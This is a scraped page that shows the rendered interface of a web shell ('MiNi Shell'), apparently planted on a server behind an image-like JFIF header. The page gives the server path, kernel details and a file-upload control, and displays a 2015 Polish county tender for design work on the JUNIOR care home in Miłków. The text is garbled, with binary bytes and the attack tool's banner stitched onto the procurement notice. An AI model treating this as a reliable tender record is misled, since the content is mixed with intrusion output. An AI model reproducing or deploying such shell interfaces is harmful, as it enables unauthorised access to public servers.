JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150824/217238-N-2015.html

<p class="kh_header"><b>Jelenia Góra: Wykonanie dokumentacji projektowo-kosztorysowej zadania polegającego na termomodernizacji budynków Domu Pomocy Społecznej JUNIOR w Miłkowie w celu poprawy efektywności energetycznej z zastosowaniem odnawialnych źródeł energii</b><br>
<b>Numer ogłoszenia: 217238 - 2015; data zamieszczenia: 24.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Jeleniogórski - Starostwo Powiatowe w Jeleniej Górze , ul. Jana Kochanowskiego 10, 58-500 Jelenia Góra, woj. dolnośląskie, tel. 75 6473103, faks 75 7526419.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.starostwo.jgora.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowej zadania polegającego na termomodernizacji budynków Domu Pomocy Społecznej JUNIOR w Miłkowie w celu poprawy efektywności energetycznej z zastosowaniem odnawialnych źródeł energii.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej zadania polegającego na: termomodernizacji budynków Domu Pomocy Społecznej JUNIOR w Miłkowie, zmianie systemu ogrzewania wraz z budową kolektorów słonecznych oraz budowie nowych sieci i przyłączy cieplnych w celu poprawy efektywności energetycznej przy jednoczesnym wykorzystaniu odnawialnych źródeł energii.
2. W skład przedmiotowego zamówienia wchodzą następujące części:
1) CZĘŚĆ I - Wykonanie dokumentacji projektowo-kosztorysowej zadania polegającego na termomodernizacji budynków Domu Pomocy Społecznej JUNIOR w Miłkowie w celu poprawy efektywności energetycznej, która obejmuje:
a) wymianę stolarki okiennej,
b) wymianę drzwi zewnętrznych,
c) docieplenie ścian zewnętrznych i stropodachów.
2) CZĘŚĆ II - Wykonanie dokumentacji projektowo-kosztorysowej zadania polegającego na zmianie systemu ogrzewania, przebudowie istniejącej kotłowni oraz instalacji kolektorów słonecznych w celu poprawy efektywności energetycznej przy wykorzystaniu odnawialnych źródeł energii, która obejmuje:
a) przebudowę istniejącej kotłowni, opalanej olejem opałowym, na opalaną biopaliwem stałym (zrębek i pellet),
b) budowę instalacji solarnej wspomagającej przygotowanie ciepłej wody,
c) przebudowę istniejącej instalacji rozdzielczej ciepła pomiędzy kotłownią a ogrzewanymi budynkami.
3. Informacje dodatkowe dotyczące obu części zamówienia:
1) Wykonawcy mogą dokonać wizytacji miejsca realizacji inwestycji i jego otoczenia w celu oszacowania na własną odpowiedzialność kosztów i ryzyka oraz uzyskania wszelkich danych, jakie mogą być niezbędne do przygotowania oferty i podpisania umowy na wykonanie przedmiotu zamówienia. W celu ustalenia terminu wizytacji należy kontaktować się z Januszem  Mrozem - Kierownikiem administracyjno-gospodarczym Domu Pomocy Społecznej JUNIOR w Miłkowie albo Leonardem Jaskółowskim - Dyrektorem Domu Pomocy Społecznej JUNIOR w Miłkowie (tel. jednostki: 75 76 10 227). 
2) Zamawiający wymaga udzielenia przez Wykonawcę rękojmi za wady przedmiotu umowy (dokumentacji projektowo-kosztorysowej) przez okres (minimum) 60 miesięcy od dnia protokolarnego odbioru dokumentacji projektowo-kosztorysowej. Okres rękojmi stanowi jedno z punktowanych kryteriów oceny ofert, stąd Wykonawca może wydłużyć oferowany termin rękojmi (maksymalnie do 72 miesięcy). 
4. Szczegółowy opis wszystkich części zamówienia został wskazany w Załączniku Nr I do niniejszego ogłoszenia (Informacje dotyczące ofert częściowych).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-6, 71.24.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga od Wykonawców wniesienia wadium na warunkach określonych 
w Specyfikacji Istotnych Warunków Zamówienia.
1)	na Część I - wadium kwocie: 500,00 zł (słownie: pięćset złotych),
2)	na Część II- wadium kwocie: 2.400,00 zł (słownie: dwa tysiące czterysta złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie - dla żadnej z dwóch części zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie Części I zamówienia Zamawiający uzna spełnienie powyższego warunku jeżeli Wykonawca wykaże, że wykonał co najmniej jedną usługę polegającą na opracowaniu dokumentacji projektowo-kosztorysowej na zadanie polegające na wymianie stolarki okiennej 
i drzwiowej oraz dociepleniu ścian zewnętrznych w obiekcie lub obiektach o łącznej powierzchni użytkowej nie mniejszej niż 300 m2.
W zakresie Części II zamówienia Zamawiający uzna spełnienie powyższego warunku jeżeli Wykonawca wykaże, że wykonał co najmniej jedną usługę polegającą na opracowaniu dokumentacji projektowo-kosztorysowej na zadanie polegające na budowie lub przebudowie kotłowni o ostatecznej mocy nie mniejszej niż 500 kW, która spełnia funkcje kotłowni opalanej biopaliwem stałym (pellet lub zrębki).
Na potwierdzenie spełniania postawionego warunku Wykonawca przedłoży - osobno dla Części I i II - wykaz wykonanych głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem  ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie - według wzorów stanowiących Załączniki Nr 6/A do Specyfikacji Istotnych Warunków Zamówienia (w zakresie Części I zamówienia) i Załączniki Nr 6/B do Specyfikacji Istotnych Warunków Zamówienia (w zakresie Części II zamówienia)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie - dla żadnej z dwóch części zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie Części I zamówienia Zamawiający uzna spełnienie powyższego warunku jeżeli Wykonawca wykaże dysponowanie co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń.
W zakresie Części II zamówienia Zamawiający uzna spełnienie powyższego warunku jeżeli Wykonawca wykaże dysponowanie co najmniej: 1) jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń; 2) jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, 
3) jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych bez ograniczeń.
Na potwierdzenie spełniania postawionego warunku Wykonawca przedłoży - osobno dla Części I i II - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, a także oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Wzór wykazu stanowią Załączniki Nr 7/A do Specyfikacji Istotnych Warunków Zamówienia 
(w zakresie Części I zamówienia) i Załączniki Nr 7/B do Specyfikacji Istotnych Warunków Zamówienia (w zakresie Części II zamówienia).
Wzór oświadczenia stanowi Załącznik Nr 8 do Specyfikacji Istotnych Warunków Zamówienia (do wykorzystania w zakresie obu części zamówienia)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie - dla żadnej z dwóch części zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W wykazie głównych usług Wykonawca zobowiązany jest wskazać wykonanie takiej ilości i rodzaju usług jak zostało to określone 
 pkt III.3.2 niniejszego ogłoszenia;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy - Załącznik Nr 1/A i/lub 1/B do Specyfikacji Istotnych Warunków Zamówienia;
2.Pełnomocnictwo do reprezentowania Wykonawcy - o ile ofertę składa pełnomocnik.
3.Dowód wniesienia wadium.
4.Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę 
lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt III.4.3.1, zastępuje się go dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokument taki powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału 
w postępowaniu o udzielenie zamówienia albo składania ofert.
5.Jeżeli Wykonawca będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów - niezależnie od charakteru prawnego łączących go z nimi stosunków - na potwierdzenie, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedkłada pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - okres rękojmi - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy:
1) W zakresie Części I zamówienia - dopuszcza się możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie dotyczącym zmiany wynagrodzenia należnego Wykonawcy w przypadku zmiany stawki podatku od towarów i usług. W takiej sytuacji każda ze stron umowy w terminie do 30 dni od dnia wejścia w życie przepisów dokonujących powyższe zmiany może zwrócić się z pisemnym wnioskiem do drugiej strony o przeprowadzenie negocjacji w sprawie zmiany wynagrodzenia należnego Wykonawcy zamówienia.
2) W zakresie Części II zamówienia - dopuszcza się możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie dotyczącym zmiany:
a) wynagrodzenia należnego WYKONAWCY w przypadku zmiany stawki podatku od towarów i usług. W takiej sytuacji każda ze stron w terminie do 30 dni od dnia wejścia w życie przepisów dokonujących powyższe zmiany może zwrócić się z pisemnym wnioskiem do drugiej strony o przeprowadzenie negocjacji w sprawie zmiany wynagrodzenia należnego WYKONAWCY zamówienia;
b) terminu wykonania zamówienia - przy czym zmiana ta może wynikać wyłącznie 
z okoliczności niezależnych od ZAMAWIAJĄCEGO i WYKONAWCY, uniemożliwiających wykonanie zamówienia w wymaganym terminie, związanych 
z przedłużaniem się procedury administracyjnej w zakresie wydania wymaganych przepisami prawa decyzji, zezwoleń czy uzgodnień.
Wszelkie zmiany treści zawartej umowy lub jej uzupełnienia wymagają formy pisemnej w postaci aneksu podpisanego przez obie strony pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamowienia.starostwo.jgora.pl/2015.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Jeleniej Górze, Biuro Zamówień Publicznych, ul. Kochanowskiego 10, 58-500 Jelenia Góra (I piętro, pok. 15).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.09.2015 godzina 10:00, miejsce: Starostwo Powiatowe w Jeleniej Górze, Kancelaria ogólna, ul. Kochanowskiego 10, 58-500 Jelenia Góra (pokój nr 7, parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej zadania polegającego na termomodernizacji budynków Domu Pomocy Społecznej JUNIOR w Miłkowie w celu poprawy efektywności energetycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
a) wymianę stolarki okiennej,
b) wymianę drzwi zewnętrznych,
c) docieplenie ścian zewnętrznych i stropodachów.
Istotne postanowienia dotyczące przedmiotu zamówienia dotyczące CZĘŚCI I:
a) Termomodernizacja obejmuje budynki Domu Pomocy Społecznej JUNIOR w Miłkowie oznaczone numerami: 1, 3, 6 i 7 - w zakresie określonym w Opisach techniczno-budowlanych tych budynków, załączonych do niniejszej SIWZ wraz ze zdjęciami budynków oraz rzutami poszczególnych kondygnacji, a także planem sytuacyjnym obiektu oraz mapą zasadniczą obiektu. 
b) Dokumentacja projektowo-kosztorysowa zadania zostanie opracowana zgodnie 
z obowiązującymi przepisami prawa i normami stosowanymi w budownictwie, w tym 
w szczególności zgodnie z przepisami: 
- ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013 r., poz. 1409 
z późn. zm.) oraz przepisami wykonawczymi,
- rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.),
- rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389).
c) Dokumentacja projektowa będzie służyć do opisu przedmiotu zamówienia w postępowaniu o udzielenie zamówienia publicznego na roboty budowlane, dlatego też dokumentacja musi być opracowana zgodnie z art. 29-31 ustawy Pzp. Wymagane jest, aby Wykonawca opisał przedmiot zamówienia na roboty budowlane bez wskazania znaków towarowych, patentów lub pochodzenia, chyba, że nie będzie możliwości opisania go za pomocą dostatecznie dokładnych określeń - wówczas Wykonawca poda co najmniej dwóch producentów materiałów lub urządzeń oraz użyje sformułowanie lub równoważny, a także poda parametry równoważności tych materiałów lub urządzeń i opisze, w jaki sposób równoważność ma zostać zweryfikowana przez Zamawiającego.
d) Kluczowe etapy prac projektowych, dotyczące przyjętej koncepcji (rozwiązania projektowego) zastosowanych materiałów i urządzeń, wymagają akceptacji Zamawiającego.
e) Zakres rzeczowy dokumentacji obejmuje opracowanie:
- projektu budowlanego (w tym: informacja dotycząca bezpieczeństwa 
i ochrony zdrowia - BIOZ, charakterystyka energetyczna) - w ilości 5 egz. + 1 egz. w wersji elektronicznej edytowalnej + format pdf;
- projektu wykonawczego - w ilości 4 egz. + 1 egz. w wersji elektronicznej edytowalnej + format pdf;
- specyfikacji technicznej wykonania i odbioru robót - w ilości 3 egz. + 1 egz. w wersji elektronicznej edytowalnej + format pdf;
- przedmiaru robót - w ilości 3 egz. + 1 egz. w wersji elektronicznej edytowalnej + format pdf;
- kosztorysu inwestorskiego - w ilości 2 egz. + 1 egz. w wersji elektronicznej edytowalnej + format pdf;
f) W/w dokumenty Wykonawca przekaże Zamawiającemu w formie pisemnej oraz na płycie CD w wersji elektronicznej edytowalnej (.doc, .dgw, .xls) i w formacie .pdf. 
